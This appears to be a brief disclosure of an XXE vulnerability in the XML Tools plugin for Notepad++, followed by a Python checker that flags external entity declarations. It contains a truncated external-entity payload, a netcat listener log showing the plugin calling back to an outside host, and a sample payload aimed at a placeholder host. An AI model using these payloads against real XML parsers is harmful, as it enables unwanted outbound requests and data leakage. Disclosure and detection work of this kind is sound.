XML Tools for Notepad++ has an XXE vulnerability.
When we install the XML Tools plugin in Notepad++ and want to check XML files, for example:
%remote;]>
<users>
<user>BC48F6077761C9197752A3990A2B396F</user>
<root>
</root></users>
XML Tools sends a request to 188.187..:4444 and waits while it downloads the 1.xml file
root@vps-1062110:~# nc -l -vv -p 4444
listening on [any] 4444 ...
Warning: forward host lookup failed for dynamicip-188-187--.pppoe.volgograd.ertelecom.ru: Unknown host
connect to [109.120.--.--] from dynamicip-188-187--.pppoe.volgograd.ertelecom.ru [188.187..] 32805
GET /1.xml HTTP/1.0
Host: 109.120.--.--:4444
Accept-Encoding: gzip
The release 2.4 of XMLTools adds a "Prevent XXE" mode which should solve the problem.
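
A defensive pre-check in the spirit of the "Prevent XXE" mode mentioned above, as an added example (not XML Tools' own code, which this page does not show): it uses Python's expat bindings to list the external DTD and entity declarations in a document without fetching anything. The sample documents, the host `collector.example` and the function names are constructed for illustration.

```python
import xml.parsers.expat as expat

# Constructed sample in the shape of the report: an external parameter entity
# referenced in the DTD. The host is a placeholder; port and file name follow the page.
SAMPLE_XXE = b"""<?xml version="1.0"?>
<!DOCTYPE users [
  <!ENTITY % remote SYSTEM "http://collector.example:4444/1.xml">
  %remote;
]>
<users><user>BC48F6077761C9197752A3990A2B396F</user></users>"""

# Constructed benign document: a DTD with an internal entity only.
SAMPLE_CLEAN = b"""<?xml version="1.0"?>
<!DOCTYPE users [ <!ENTITY org "Example"> ]>
<users><user>&org;</user></users>"""


def external_references(data):
    """Return (kind, name, system_id) for every external DTD or entity the
    document declares. Nothing is fetched: expat only reports declarations."""
    found = []
    parser = expat.ParserCreate()
    # Never expand parameter entities or load an external DTD subset.
    parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)

    def on_doctype(name, system_id, public_id, has_internal_subset):
        if system_id or public_id:
            found.append(("doctype", name, system_id))

    def on_entity(name, is_param, value, base, system_id, public_id, notation):
        # Internal entities carry a value; external ones carry identifiers.
        if value is None and (system_id or public_id):
            kind = "parameter-entity" if is_param else "general-entity"
            found.append((kind, name, system_id))

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity
    parser.Parse(data, True)
    return found


def safe_to_validate(data):
    """Gate for a validator: refuse documents that name external resources."""
    return not external_references(data)


if __name__ == "__main__":
    for label, doc in (("xxe", SAMPLE_XXE), ("clean", SAMPLE_CLEAN)):
        print(label, safe_to_validate(doc), external_references(doc))
```

Malformed input raises `expat.ExpatError`, which a caller should treat as a refusal rather than a pass.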